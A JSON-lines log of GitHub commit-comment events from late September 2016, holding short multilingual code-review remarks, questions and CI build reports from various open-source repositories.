{"id":"4621406206","type":"CommitCommentEvent","actor":{"login":"Saisimon"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19183292,"position":15,"line":51,"path":"program/c/ex17.c","commit_id":"d4821b0037a3494fa1eb6b4aa890887f6dcba423","created_at":"2016-09-27T01:05:50Z","updated_at":"2016-09-27T01:05:50Z","body":"只释放 Connection ?"}},"created_at":"2016-09-27T01:05:50Z"}
{"id":"4621408925","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19183311,"position":14,"line":310,"path":"ryu/lib/stplib.py","commit_id":"0fbbfda834cf742a9aa3650a8b3609ee8bc21fc8","created_at":"2016-09-27T01:06:57Z","updated_at":"2016-09-27T01:06:57Z","body":"備忘：\r\nlink_add/delete と同様に、bridge 内の関数へ ports_state の更新を移動"}},"created_at":"2016-09-27T01:06:57Z"}
{"id":"4621409098","type":"CommitCommentEvent","actor":{"login":"Flutter01"},"repo":{"name":"OBSH-SoftAttract/OBSH"},"payload":{"comment":{"id":19183312,"position":null,"line":null,"path":null,"commit_id":"2b96f7ddd2ee93e60024be3e39fbf71265841659","created_at":"2016-09-27T01:07:02Z","updated_at":"2016-09-27T01:07:02Z","body":"[小画家的功能需求试验版.docx](https://github.com/OBSH-SoftAttract/OBSH/files/494379/default.docx)\r\n"}},"created_at":"2016-09-27T01:07:02Z"}
{"id":"4621410555","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19183313,"position":null,"line":null,"path":null,"commit_id":"4b7f4b97cb059f16cbace0cf870becbdcb396240","created_at":"2016-09-27T01:07:37Z","updated_at":"2016-09-27T01:07:37Z","body":"備忘：\r\n\r\nPython2/3 の互換性の問題だったので、両方のバージョンで動作確認が必要"}},"created_at":"2016-09-27T01:07:37Z"}
{"id":"4621414353","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19183321,"position":13,"line":13,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-27T01:09:06Z","updated_at":"2016-09-27T01:09:06Z","body":"@wooorm I know, but 99% of this module's usage will be with `remark-html`, so I figured I'd include it. Makes the example more complete.\r\n\r\nUnless I'm misunderstanding what you meant?"}},"created_at":"2016-09-27T01:09:06Z"}
{"id":"4621415415","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19183327,"position":23,"line":23,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-27T01:09:32Z","updated_at":"2016-09-27T01:09:32Z","body":"@wooorm nice catch!"}},"created_at":"2016-09-27T01:09:32Z"}
{"id":"4621419253","type":"CommitCommentEvent","actor":{"login":"d87335903"},"repo":{"name":"d87335903/video_guide"},"payload":{"comment":{"id":19183352,"position":null,"line":null,"path":null,"commit_id":"b4eb37cdf17f110cdcebe9a4cbe0d2d32ff16fd9","created_at":"2016-09-27T01:11:06Z","updated_at":"2016-09-27T01:11:06Z","body":"es6 new feature,https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Map,Map object"}},"created_at":"2016-09-27T01:11:06Z"}
{"id":"4621419931","type":"CommitCommentEvent","actor":{"login":"khuey"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19183355,"position":null,"line":null,"path":null,"commit_id":"8a2edcb66395f803080d764476d1da965036d325","created_at":"2016-09-27T01:11:19Z","updated_at":"2016-09-27T01:11:19Z","body":"Ok, I can reproduce this, and think I know what's going on.  I don't really understand why it seems to be no-syscallbuf only though."}},"created_at":"2016-09-27T01:11:19Z"}
{"id":"4621420760","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19183359,"position":7,"line":25,"path":"package.json","commit_id":"93a1bb0a925de436d48d57f4289f419d27b02a3b","created_at":"2016-09-27T01:11:32Z","updated_at":"2016-09-27T01:11:32Z","body":"Thanks!"}},"created_at":"2016-09-27T01:11:32Z"}
{"id":"4621425746","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19183377,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T01:13:21Z","updated_at":"2016-09-27T01:13:21Z","body":"Is this working for you guys? It seems to freeze up / get stuck in a loop for me"}},"created_at":"2016-09-27T01:13:21Z"}
{"id":"4621425820","type":"CommitCommentEvent","actor":{"login":"liuyihuansmm"},"repo":{"name":"liuyihuansmm/PCloud"},"payload":{"comment":{"id":19183378,"position":null,"line":null,"path":null,"commit_id":"fc7fe8afce9645b92b6946e3e1536136f46162da","created_at":"2016-09-27T01:13:23Z","updated_at":"2016-09-27T01:13:23Z","body":"前台页面网上down的，仅供参考学习。"}},"created_at":"2016-09-27T01:13:23Z"}
{"id":"4621425901","type":"CommitCommentEvent","actor":{"login":"Adrianoob"},"repo":{"name":"qsong4/CS525-assigns"},"payload":{"comment":{"id":19183380,"position":null,"line":null,"path":null,"commit_id":"0675d226f2e57f2a8134383231dd0c610078f93e","created_at":"2016-09-27T01:13:25Z","updated_at":"2016-09-27T01:13:25Z","body":"another two things that I forgot to mention.\r\n    line 84, I think that line is obsolete? should be deleted?\r\n    line 221, readLastBlock(), I think the totalNumPages is always bigger than the largest page number. For example, if totalNumPages is 1, then the largest page number is 0, so it's not possible to read page 1. "}},"created_at":"2016-09-27T01:13:25Z"}
{"id":"4621426827","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19183383,"position":5,"line":23,"path":"index.js","commit_id":"1916a393626a372b518fc790a2229827701db676","created_at":"2016-09-27T01:13:46Z","updated_at":"2016-09-27T01:13:46Z","body":"@wooorm yeah, it's on my list to do that in a 1.1 release. I pushed this out fast as I had a significant need for it in a personal project"}},"created_at":"2016-09-27T01:13:46Z"}
{"id":"4621430622","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19183388,"position":null,"line":null,"path":null,"commit_id":"412d3b0b5c7d0ae924e7322d591a8959fce22762","created_at":"2016-09-27T01:15:22Z","updated_at":"2016-09-27T01:15:22Z","body":"++"}},"created_at":"2016-09-27T01:15:22Z"}
{"id":"4621431285","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":19183389,"position":30,"line":201,"path":"ci/pipelines/stemcell/pipeline.yml","commit_id":"9b7976d00ae9e890489db56723cdb20e1aa655f8","created_at":"2016-09-27T01:15:39Z","updated_at":"2016-09-27T01:15:39Z","body":"why did we remove `BOSHIO_TOKEN` from all these?"}},"created_at":"2016-09-27T01:15:39Z"}
{"id":"4621432218","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":19183391,"position":8,"line":61,"path":"ci/pipelines/stemcell/tasks/build.sh","commit_id":"dc5d54df460f4da8a0941cc73d6fe46c4e1350a0","created_at":"2016-09-27T01:16:01Z","updated_at":"2016-09-27T01:16:01Z","body":"is there a particular reason we should lock to a specific commit vs the already-dedicated branch?"}},"created_at":"2016-09-27T01:16:01Z"}
{"id":"4621432363","type":"CommitCommentEvent","actor":{"login":"chen787331608"},"repo":{"name":"chen787331608/Hellow-World"},"payload":{"comment":{"id":19183393,"position":null,"line":null,"path":null,"commit_id":"1faa1cc2d9303ed589fd1e054734ae0442514ab7","created_at":"2016-09-27T01:16:04Z","updated_at":"2016-09-27T01:16:04Z","body":"Py Test"}},"created_at":"2016-09-27T01:16:04Z"}
{"id":"4621435998","type":"CommitCommentEvent","actor":{"login":"strugee"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19183414,"position":7,"line":25,"path":"package.json","commit_id":"93a1bb0a925de436d48d57f4289f419d27b02a3b","created_at":"2016-09-27T01:17:30Z","updated_at":"2016-09-27T01:17:30Z","body":"@wooorm out of curiosity, how did you notice this module so fast?"}},"created_at":"2016-09-27T01:17:30Z"}
{"id":"4621439089","type":"CommitCommentEvent","actor":{"login":"wing328"},"repo":{"name":"swagger-api/swagger-codegen"},"payload":{"comment":{"id":19183423,"position":111,"line":103,"path":"modules/swagger-codegen/src/main/resources/typescript-angular2/api.mustache","commit_id":"4337f050f56c5e1e8c0c147a14e3f8f938dbf84d","created_at":"2016-09-27T01:18:43Z","updated_at":"2016-09-27T01:18:43Z","body":"@timadamson thanks for the feedback. Please open an issue to track this."}},"created_at":"2016-09-27T01:18:43Z"}
{"id":"4621453113","type":"CommitCommentEvent","actor":{"login":"ankanm"},"repo":{"name":"seomoz/roger-mesos"},"payload":{"comment":{"id":19183449,"position":38,"line":59,"path":"aaad/quotas.py","commit_id":"1bc6e56c5bb25bd1d525273665b6f59f65f61ceb","created_at":"2016-09-27T01:24:26Z","updated_at":"2016-09-27T01:24:26Z","body":"why not break out of the inner loop here?"}},"created_at":"2016-09-27T01:24:26Z"}
{"id":"4621455007","type":"CommitCommentEvent","actor":{"login":"ankanm"},"repo":{"name":"seomoz/roger-mesos"},"payload":{"comment":{"id":19183452,"position":53,"line":74,"path":"aaad/quotas.py","commit_id":"1bc6e56c5bb25bd1d525273665b6f59f65f61ceb","created_at":"2016-09-27T01:25:11Z","updated_at":"2016-09-27T01:25:11Z","body":"why not break out of the inner loop here?\r\n"}},"created_at":"2016-09-27T01:25:11Z"}
{"id":"4621456108","type":"CommitCommentEvent","actor":{"login":"lifeforfun"},"repo":{"name":"vuejs/vue-router"},"payload":{"comment":{"id":19183453,"position":16,"line":43,"path":"src/components/link.js","commit_id":"e5f0964ccc8388153a2ae61633deef448f1faa17","created_at":"2016-09-27T01:25:40Z","updated_at":"2016-09-27T01:25:40Z","body":"Should you add ``` e.stopPropagation() ``` to prevent parent node click listener ?\r\nI have the code as below:\r\n```\r\n  <router-link tag=\"li\" :to=\"item.path\" data-toggle=\"dropdown-menu\" data-trigger=\"hover\">\r\n      <a>parent menu</a>\r\n      <ul v-if=\"item.children\">\r\n          <router-link v-for=\"child of item.children\"  tag=\"li\" :to=\"child.path\">\r\n               <a>child menu</a>\r\n          </router-link>\r\n      </ul>\r\n  </router-link>\r\n```\r\n\r\nWhen i click a **child menu** , it first trigger the **child menu** and then trigger the **parent menu**, cause the route become **parent menu**."}},"created_at":"2016-09-27T01:25:40Z"}
{"id":"4621460054","type":"CommitCommentEvent","actor":{"login":"elikem"},"repo":{"name":"CruGlobal/Give_Front-end"},"payload":{"comment":{"id":19183468,"position":null,"line":null,"path":null,"commit_id":"e850588a3bcbeae715943867a29a6048de82a9c4","created_at":"2016-09-27T01:27:17Z","updated_at":"2016-09-27T01:27:17Z","body":"@riceguitar the `more` and `cart` now expand as they are supposed to.\r\n![elb0gycg05](https://cloud.githubusercontent.com/assets/1282871/18857169/b6f8479a-842f-11e6-9e43-f0545ef86bea.gif)\r\n\r\n1. There's a bug with the triangle not showing up on the `cart` popup\r\n2. Edit Profile and Sign Out aren't done yet :(.\r\n"}},"created_at":"2016-09-27T01:27:17Z"}
{"id":"4621461460","type":"CommitCommentEvent","actor":{"login":"danielgiovanny2"},"repo":{"name":"danielgiovanny2/teleincoing"},"payload":{"comment":{"id":19183471,"position":1,"line":1,"path":"LICENSE","commit_id":"dc828a5737250462fe8ed11eecfb785ad4f03174","created_at":"2016-09-27T01:27:49Z","updated_at":"2016-09-27T01:27:49Z","body":"Daniel G. Flórez"}},"created_at":"2016-09-27T01:27:49Z"}
{"id":"4621461866","type":"CommitCommentEvent","actor":{"login":"miguel-rn"},"repo":{"name":"miguel-rn/miguel-rn"},"payload":{"comment":{"id":19183474,"position":null,"line":null,"path":null,"commit_id":"53e9cceaa146787c6cee5546fe146dddc73ea520","created_at":"2016-09-27T01:28:00Z","updated_at":"2016-09-27T01:28:00Z","body":"oops"}},"created_at":"2016-09-27T01:28:00Z"}
{"id":"4621466303","type":"CommitCommentEvent","actor":{"login":"Nkcurlett"},"repo":{"name":"Nkcurlett/basicwebpage"},"payload":{"comment":{"id":19183482,"position":null,"line":null,"path":null,"commit_id":"36dbbc303319027da719008b752de9913ca5b03e","created_at":"2016-09-27T01:29:54Z","updated_at":"2016-09-27T01:29:54Z","body":"Added additional comment for this commit"}},"created_at":"2016-09-27T01:29:54Z"}
{"id":"4621467696","type":"CommitCommentEvent","actor":{"login":"nickjosh"},"repo":{"name":"nickjosh/basicwebpage"},"payload":{"comment":{"id":19183484,"position":null,"line":null,"path":null,"commit_id":"bcae31f8f937020c319748274e1a5ff1518d7661","created_at":"2016-09-27T01:30:26Z","updated_at":"2016-09-27T01:30:26Z","body":"Added homework for 9/27/16"}},"created_at":"2016-09-27T01:30:26Z"}
{"id":"4621469533","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19183486,"position":null,"line":null,"path":null,"commit_id":"ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2","created_at":"2016-09-27T01:31:07Z","updated_at":"2016-09-27T01:31:07Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2310 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.51%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T01:31:07Z"}
{"id":"4621471027","type":"CommitCommentEvent","actor":{"login":"Carlemi"},"repo":{"name":"Carlemi/Maps"},"payload":{"comment":{"id":19183488,"position":null,"line":null,"path":null,"commit_id":"40cb07b0f9039756d64103c0738f1a9e32108f47","created_at":"2016-09-27T01:31:45Z","updated_at":"2016-09-27T01:31:45Z","body":"borrado"}},"created_at":"2016-09-27T01:31:45Z"}
{"id":"4621472869","type":"CommitCommentEvent","actor":{"login":"sarav"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":19183491,"position":null,"line":null,"path":null,"commit_id":"a822a160185afb49981cd61e81aaa760baaf0386","created_at":"2016-09-27T01:32:29Z","updated_at":"2016-09-27T01:32:29Z","body":"Github UI is so confusing. Consider this approved. "}},"created_at":"2016-09-27T01:32:29Z"}
{"id":"4621475945","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19183497,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-27T01:33:44Z","updated_at":"2016-09-27T01:33:44Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-27T01:33:44Z"}
{"id":"4621476238","type":"CommitCommentEvent","actor":{"login":"Goya-"},"repo":{"name":"gi3dp/odooDevelpment"},"payload":{"comment":{"id":19183498,"position":null,"line":null,"path":null,"commit_id":"060637b861d560a5c8e00f86179169aba33509d4","created_at":"2016-09-27T01:33:51Z","updated_at":"2016-09-27T01:33:51Z","body":"需要merge"}},"created_at":"2016-09-27T01:33:51Z"}
{"id":"4621477721","type":"CommitCommentEvent","actor":{"login":"pshires"},"repo":{"name":"ORNL-BTRIC/EnergyPlus"},"payload":{"comment":{"id":19183501,"position":null,"line":null,"path":null,"commit_id":"132b004bb39a1d20b0f513c0da5beacf6e2254a4","created_at":"2016-09-27T01:34:30Z","updated_at":"2016-09-27T01:34:30Z","body":"@mbadams5 @kburova I know this is NOT the way we want to do this, however I thought you all might be interested to know that on my 2015 Macbook Pro 13 inch when profiling E+ in Release mode with the prj10.idf file as input, we are looking at a **~30 times faster** input processor. It seems that once we figure out which objects have this \"global\" name checking thing going on, we can get rid of VerifyName entirely and come up with a better way to cache these inter-object names"}},"created_at":"2016-09-27T01:34:30Z"}
{"id":"4621481761","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19183515,"position":null,"line":null,"path":null,"commit_id":"498cf93a5c9072b039f2c49b07e80e2b97d9fec4","created_at":"2016-09-27T01:36:13Z","updated_at":"2016-09-27T01:36:13Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-498cf93a5c9072b039f2c49b07e80e2b97d9fec4-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-27T01:36:13Z"}
{"id":"4621484821","type":"CommitCommentEvent","actor":{"login":"athan1925"},"repo":{"name":"athan1925/Mysimpleapp"},"payload":{"comment":{"id":19183534,"position":2,"line":2,"path":"README.md","commit_id":"3cf92b8652c3b4913e8cb9b5ef7752034e402062","created_at":"2016-09-27T01:37:28Z","updated_at":"2016-09-27T01:37:28Z","body":"``<img src=\"http://i.imgur.com/UvVwzpM.jpg\" />\r\n``<img src=\"http://i.imgur.com/4WnCPPj.jpg\" />\r\n\r\n\r\n"}},"created_at":"2016-09-27T01:37:28Z"}
{"id":"4621485674","type":"CommitCommentEvent","actor":{"login":"athan1925"},"repo":{"name":"athan1925/Mysimpleapp"},"payload":{"comment":{"id":19183537,"position":null,"line":null,"path":null,"commit_id":"3cf92b8652c3b4913e8cb9b5ef7752034e402062","created_at":"2016-09-27T01:37:49Z","updated_at":"2016-09-27T01:37:49Z","body":"````<img src=\"http://i.imgur.com/UvVwzpM.jpg\" />\r\n``<img src=\"http://i.imgur.com/4WnCPPj.jpg\" />"}},"created_at":"2016-09-27T01:37:49Z"}
{"id":"4621487471","type":"CommitCommentEvent","actor":{"login":"athan1925"},"repo":{"name":"athan1925/Mysimpleapp"},"payload":{"comment":{"id":19183542,"position":null,"line":null,"path":null,"commit_id":"3cf92b8652c3b4913e8cb9b5ef7752034e402062","created_at":"2016-09-27T01:38:33Z","updated_at":"2016-09-27T01:38:33Z","body":"``<img src=\"http://i.imgur.com/UvVwzpM.jpg\" />\r\n``<img src=\"http://i.imgur.com/4WnCPPj.jpg\" />"}},"created_at":"2016-09-27T01:38:33Z"}
{"id":"4621490875","type":"CommitCommentEvent","actor":{"login":"APOPHIS9283"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19183552,"position":null,"line":null,"path":null,"commit_id":"58d838da8663e6ebd881858e950079f72eb72b03","created_at":"2016-09-27T01:39:59Z","updated_at":"2016-09-27T01:39:59Z","body":"I get great results with 0."}},"created_at":"2016-09-27T01:39:59Z"}
{"id":"4621492687","type":"CommitCommentEvent","actor":{"login":"toby-1-kenobi"},"repo":{"name":"toby-1-kenobi/sag_reporter"},"payload":{"comment":{"id":19183555,"position":null,"line":null,"path":null,"commit_id":"881153ab2ffcf724f6d243c0eb6768977a02dfa0","created_at":"2016-09-27T01:40:42Z","updated_at":"2016-09-27T01:40:42Z","body":"At this point the repository was cleaned of all references to what is considered to be private data, leaving this commit and some earlier commits completely empty."}},"created_at":"2016-09-27T01:40:42Z"}
{"id":"4621497005","type":"CommitCommentEvent","actor":{"login":"adamhill"},"repo":{"name":"rid00z/FreshMvvm"},"payload":{"comment":{"id":19183573,"position":11,"line":11,"path":"src/FreshMvvm/FreshPageModelMapper.cs","commit_id":"90aeaa718c44e7d3be385738b155ed9533d74994","created_at":"2016-09-27T01:42:30Z","updated_at":"2016-09-27T01:42:30Z","body":"Shouldn't this line be (\"ViewModel\", \"View\")? \r\n\r\nI thought View/ViewModel conventions were supported now."}},"created_at":"2016-09-27T01:42:30Z"}
{"id":"4621498140","type":"CommitCommentEvent","actor":{"login":"d87335903"},"repo":{"name":"d87335903/video_guide"},"payload":{"comment":{"id":19183577,"position":null,"line":null,"path":null,"commit_id":"60377f3ef411b8d314fab691f6aa67e30bf3fba4","created_at":"2016-09-27T01:42:56Z","updated_at":"2016-09-27T01:42:56Z","body":"数组（Array）和集合（Set）的转换,` mySet = new Set([1,2,3,4,5,4,3,2,1]);\r\n     console.log(mySet);\r\n     for(let item of mySet){\r\n         console.log(item);\r\n     }`"}},"created_at":"2016-09-27T01:42:56Z"}
{"id":"4621502388","type":"CommitCommentEvent","actor":{"login":"vivekarvind"},"repo":{"name":"Russell91/TensorBox"},"payload":{"comment":{"id":19183584,"position":null,"line":null,"path":null,"commit_id":"be6a742702b38be0a4f92815b42edc59d32f583b","created_at":"2016-09-27T01:44:30Z","updated_at":"2016-09-27T01:44:30Z","body":"Sorry my bad. It works. Thanks."}},"created_at":"2016-09-27T01:44:30Z"}
{"id":"4621505662","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19183587,"position":null,"line":null,"path":null,"commit_id":"e10d813c627cbb7a00e016ff19a4017facb0c086","created_at":"2016-09-27T01:45:46Z","updated_at":"2016-09-27T01:45:46Z","body":"Fixes browser-compatibility issues in iOS (Safari, Firefox, Chrome, Dolphin) as noted in #11 "}},"created_at":"2016-09-27T01:45:46Z"}
{"id":"4621509179","type":"CommitCommentEvent","actor":{"login":"kburova"},"repo":{"name":"ORNL-BTRIC/EnergyPlus"},"payload":{"comment":{"id":19183600,"position":null,"line":null,"path":null,"commit_id":"132b004bb39a1d20b0f513c0da5beacf6e2254a4","created_at":"2016-09-27T01:47:06Z","updated_at":"2016-09-27T01:47:06Z","body":"@mbadams5 @pshires I think i found where we need to change things. There are 5 specific VerifyUnique...  functions which use 5 global arrays of \"DataComponent\" type.  I'll try to refactor those tomorrow on separate branch and then we can run performance tests again to see if it works. If it does we can combine changes."}},"created_at":"2016-09-27T01:47:06Z"}
{"id":"4621511145","type":"CommitCommentEvent","actor":{"login":"rid00z"},"repo":{"name":"rid00z/FreshMvvm"},"payload":{"comment":{"id":19183606,"position":11,"line":11,"path":"src/FreshMvvm/FreshPageModelMapper.cs","commit_id":"90aeaa718c44e7d3be385738b155ed9533d74994","created_at":"2016-09-27T01:47:51Z","updated_at":"2016-09-27T01:47:51Z","body":"Currently, the default is either Page and PageModel or Page and ViewModel. Eg, QuotePage and QuoteViewModel. It's a little debated this topic, but that reason that it's like that it because it's not natural to call a Page and View. "}},"created_at":"2016-09-27T01:47:51Z"}
{"id":"4621512642","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-orbital-plugin"},"payload":{"comment":{"id":19183610,"position":null,"line":null,"path":null,"commit_id":"96b3045f68731197056b1c7f96a4b3281cc2492b","created_at":"2016-09-27T01:48:27Z","updated_at":"2016-09-27T01:48:27Z","body":"cc @daliwei "}},"created_at":"2016-09-27T01:48:27Z"}
{"id":"4621513181","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-paypal-express-plugin"},"payload":{"comment":{"id":19183612,"position":null,"line":null,"path":null,"commit_id":"62b91d909048dd4fbf8892f838effa7f4f514f0d","created_at":"2016-09-27T01:48:41Z","updated_at":"2016-09-27T01:48:41Z","body":"cc cc @daliwei "}},"created_at":"2016-09-27T01:48:41Z"}
{"id":"4621514363","type":"CommitCommentEvent","actor":{"login":"woodpecker2016"},"repo":{"name":"woodpecker2016/hello-world"},"payload":{"comment":{"id":19183616,"position":1,"line":1,"path":"README.md","commit_id":"c3029d07d6a06ffc386b9e6aa83df08aa904399b","created_at":"2016-09-27T01:49:11Z","updated_at":"2016-09-27T01:49:11Z","body":"print (\"hello world\")"}},"created_at":"2016-09-27T01:49:11Z"}
{"id":"4621516991","type":"CommitCommentEvent","actor":{"login":"walidsat"},"repo":{"name":"hola/cdn"},"payload":{"comment":{"id":19183618,"position":null,"line":null,"path":null,"commit_id":"6ec0c30d7eb224c0a1fdf31f75efa6a34a5ce64f","created_at":"2016-09-27T01:50:16Z","updated_at":"2016-09-27T01:50:16Z","body":"http://37.220.128.130:9100/12\r\n\r\n"}},"created_at":"2016-09-27T01:50:16Z"}
{"id":"4621522785","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"product-definition-center/pdc-ruby-gem"},"payload":{"comment":{"id":19183636,"position":7,"line":35,"path":"lib/pdc/resource/rest_api.rb","commit_id":"136f1088c209dc320f2efe0864c6df30f3cd0dea","created_at":"2016-09-27T01:52:35Z","updated_at":"2016-09-27T01:52:35Z","body":"Doing it here as connection is added by this module."}},"created_at":"2016-09-27T01:52:35Z"}
{"id":"4621527217","type":"CommitCommentEvent","actor":{"login":"JohnPucciarelli"},"repo":{"name":"tbogatchev/path_timer"},"payload":{"comment":{"id":19183651,"position":73,"line":65,"path":"app/actions/fetchDirections.js","commit_id":"793d872ffcc67d58df646811a248f4c616bcef15","created_at":"2016-09-27T01:54:18Z","updated_at":"2016-09-27T01:54:18Z","body":"`.json()` returns a promise?"}},"created_at":"2016-09-27T01:54:18Z"}
{"id":"4621527272","type":"CommitCommentEvent","actor":{"login":"sthaha"},"repo":{"name":"product-definition-center/pdc-ruby-gem"},"payload":{"comment":{"id":19183652,"position":5,"line":69,"path":"lib/pdc/resource/identity.rb","commit_id":"136f1088c209dc320f2efe0864c6df30f3cd0dea","created_at":"2016-09-27T01:54:19Z","updated_at":"2016-09-27T01:54:19Z","body":"The issue with this is that if you reconfigure PDC, it will use the *new* site and api_root and not the original site and api_root."}},"created_at":"2016-09-27T01:54:19Z"}
{"id":"4621532388","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19183657,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T01:56:10Z","updated_at":"2016-09-27T01:56:10Z","body":"@SubJunk What is freezing up/looping? Is it related to this commit?"}},"created_at":"2016-09-27T01:56:10Z"}
{"id":"4621533016","type":"CommitCommentEvent","actor":{"login":"mattab"},"repo":{"name":"piwik/piwik"},"payload":{"comment":{"id":19183659,"position":22,"line":22,"path":"plugins/Goals/Updates/3.0.0-b1.php","commit_id":"ab3eba1b854e978ed4f3bcb3b144a4fff2964aab","created_at":"2016-09-27T01:56:24Z","updated_at":"2016-09-27T01:56:24Z","body":"for @sgiehl "}},"created_at":"2016-09-27T01:56:24Z"}
{"id":"4621533381","type":"CommitCommentEvent","actor":{"login":"dearsq"},"repo":{"name":"Saisimon/tip"},"payload":{"comment":{"id":19183663,"position":15,"line":51,"path":"program/c/ex17.c","commit_id":"d4821b0037a3494fa1eb6b4aa890887f6dcba423","created_at":"2016-09-27T01:56:33Z","updated_at":"2016-09-27T01:56:33Z","body":"Good"}},"created_at":"2016-09-27T01:56:33Z"}
{"id":"4621534630","type":"CommitCommentEvent","actor":{"login":"dlfivefifty"},"repo":{"name":"ApproxFun/SpectralMeasures.jl"},"payload":{"comment":{"id":19183679,"position":null,"line":null,"path":null,"commit_id":"fc7f00b47fc07ec3f9c16e65e837a48ecd406abf","created_at":"2016-09-27T01:57:00Z","updated_at":"2016-09-27T01:57:00Z","body":"This change to `givenstail` broke QL.  I'm restoring it to the previous definition, and getting the unit tests working.  "}},"created_at":"2016-09-27T01:57:00Z"}
{"id":"4621534796","type":"CommitCommentEvent","actor":{"login":"youris00"},"repo":{"name":"springsome/Chromium"},"payload":{"comment":{"id":19183682,"position":null,"line":null,"path":null,"commit_id":"058a841ecedb46a7972535ac8abd88de37a1c4c3","created_at":"2016-09-27T01:57:04Z","updated_at":"2016-09-27T01:57:04Z","body":"이상훈"}},"created_at":"2016-09-27T01:57:04Z"}
{"id":"4621536265","type":"CommitCommentEvent","actor":{"login":"kocio-pl"},"repo":{"name":"gravitystorm/openstreetmap-carto"},"payload":{"comment":{"id":19183689,"position":null,"line":null,"path":null,"commit_id":"5ee3078d492afcdb320607d203e6964354d7a8c4","created_at":"2016-09-27T01:57:37Z","updated_at":"2016-09-27T01:57:37Z","body":"New changes should be probably under v2.44.0 section."}},"created_at":"2016-09-27T01:57:37Z"}
